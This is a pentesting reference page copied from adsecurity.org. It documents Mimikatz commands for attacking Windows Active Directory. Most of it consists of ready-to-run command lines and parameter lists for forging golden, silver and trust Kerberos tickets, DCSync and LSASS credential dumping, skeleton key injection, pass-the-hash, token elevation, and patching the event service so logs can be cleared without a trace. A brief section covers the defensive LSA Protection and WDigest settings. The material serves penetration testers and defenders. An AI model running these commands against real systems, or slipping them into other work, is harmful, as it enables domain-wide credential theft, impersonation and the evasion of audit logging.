Pentesting

Mimikatz

The content of this page was copied adsecurity.org

LM and Clear-Text in memory

Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory.

In order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)

Mimikatz & LSA Protection:

Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs):

The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages.

Enabling LSA protection:

  1. Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001.

  2. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa. In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK.

LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”).

Mimikatz-Driver-Remove-LSASS-Protection

Main

EVENT

EVENT::Clear – Clear an event log Mimikatz-Event-Clear

EVENT:::Drop – (experimental) Patch Events service to avoid new events

Mimikatz-Event-Drop

Note: Run privilege::debug then event::drop to patch the event log. Then run Event::Clear to clear the event log without any log cleared event (1102) being logged.

KERBEROS

Golden Ticket

A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.

A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.

Mimikatz Golden Ticket Command Reference:

The Mimikatz command to create a golden ticket is “kerberos::golden”

  • /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.

  • /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.

  • /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.

  • /user – username to impersonate

  • /groups (optional) – group RIDs the user is a member of (the first is the primary group). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).

  • /krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT.

  • /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.

  • /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.

  • /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).

  • /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.

  • /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).

  • /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).

  • /sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest).

  • /aes128 – the AES128 key

  • /aes256 – the AES256 key

Golden Ticket Default Groups:

  • Domain Users SID: S-1-5-21<DOMAINID>-513

  • Domain Admins SID: S-1-5-21<DOMAINID>-512

  • Schema Admins SID: S-1-5-21<DOMAINID>-518

  • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)

  • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520

.\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

Golden tickets across domains

Silver Ticket

A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign.

Example Mimikatz Command to Create a Silver Ticket:

The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 paramteer. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.

mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit

Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other. More background on Trust Tickets.

Dumping trust passwords (trust keys)

Mimikatz “privilege::debug” “lsadump::trust /patch” exit

Create a forged trust ticket (inter-realm TGT) using Mimikatz

Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.

Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit

Trust Ticket Specific Required Parameters:

  • /target – the target domain’s FQDN.

  • /service – the kerberos service running in the target domain (krbtgt).

  • /rc4 – the NTLM hash for the service kerberos service account (krbtgt).

  • /ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.

More KERBEROS

KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets. Similar to functionality of “klist”.

KERBEROS::PTC – pass the cache (NT6) *Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.

A good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.

Mimikatz-PTC-PyKEK-ccacheFile

KERBEROS::PTT – pass the ticket After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required. Similar to SEKURLSA::PTH (Pass-The-Hash).

  • /filename – the ticket’s filename (can be multiple)

  • /diretory – a directory path, all .kirbi files inside will be injected.

KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2

KERBEROS::Purge – purge all Kerberos tickets Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.

Mimikatz-Kerberos-Purge

KERBEROS::TGT – get current TGT for current user.

Mimikatz-Kerberos-TGT

LSADUMP

LSADUMP::DCShadow – Set the current machines as DC to have the habitability to create new objects inside the DC (persistent method). This requires full AD admin rights or KRBTGT pw hash. DCShadow temporarily sets the computer to be a “DC” for the purposes of replication:

  • Creates 2 objects in the AD forest Configuration partition.

  • Updates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section.

  • Pushes the updates to DCs via DrsReplicaAdd and KCC.

  • Removes the created objects from the Configuration partition.

LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account) Requires membership in Domain Administrator, domain Administrators, or custom delegation.

A major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller.

DCSync Options:

  • /all – DCSync pull data for the entire domain.

  • /user – user id or SID of the user you want to pull the data for.

  • /domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.

  • /csv – export to csv

  • /dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.

There’s also a /guid parameter.

DCSync Command Examples:

Pull password data for the KRBTGT user account in the rd.adsecurity.org domain: Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit

Pull password data for the Administrator user account in the rd.adsecurity.org domain: Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit

Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain: Mimikatz “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit

LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights.

  • /inject – Inject LSASS to extract credentials

  • /name – account name for target user account

  • /id – RID for target user account

  • /patch – patch LSASS.

Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets.

mimikatz lsadump::lsa /inject exit

LSADUMP::NetSync

NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data.

LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.

LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).

LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.

LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).

MISC

MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.

"privilege::debug" "misc::skeleton"

PRIVILEGE

PRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights.

PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).

SEKURLSA

SEKURLSA::Credman – List Credentials Manager

SEKURLSA::Ekeys – list Kerberos encryption keys

SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)

SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data

SEKURLSA::SSP – Lists SSP credentials

SEKURLSA::Wdigest – List WDigest credentials

SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials.

  • Dumps password data in LSASS for currently logged on (or recently logged on) accounts as well as services running under the context of user credentials.

  • Account passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows 8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2 doesn’t store the account password in this manner in most cases. KB2871997 “back-ports” this security capability to Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the computer needs additional configuration after applying KB2871997.

  • Requires administrator access (with debug rights) or Local SYSTEM rights

SEKURLSA::Minidump – switch to LSASS minidump process context (read lsass dump)

SEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).

Mimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with NTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).

  • /user – the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.

  • /domain – the fully qualified domain name – without domain or in case of local user/admin, use computer or server name, workgroup or whatever.

  • /rc4 or /ntlm – optional – the RC4 key / NTLM hash of the user’s password.

  • /run – optional – the command line to run – default is: cmd to have a shell.

Mimikatz-Sekurlsa-PTH

SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).

  • /export – optional – tickets are exported in .kirbi files. They start with user’s LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT)

Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service. This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.

The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.

Command: mimikatz sekurlsa::tickets exit

  • Dumps all authenticated Kerberos tickets on a system.

  • Requires administrator access (with debug) or Local SYSTEM rights

SID

The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.

SID::add – Add a SID to SIDHistory of an object

Mimikatz-SID-add

SID::modify – Modify object SID of an object

Mimikatz-SID-Modify

TOKEN

The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.

TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API. Requires Administrator rights.

Mimikatz-Token-Elevate1

Find a domain admin credential on the box and use that token: token::elevate /domainadmin

Mimikatz-Token-Elevate-DomainAdmin

TOKEN::List – list all tokens of the system

TS

TS::MultiRDP – (experimental) Patch Terminal Server service to allow multiple users

Mimikatz-TS-MultiRDP

TS::Sessions – List TS/RDP sessions.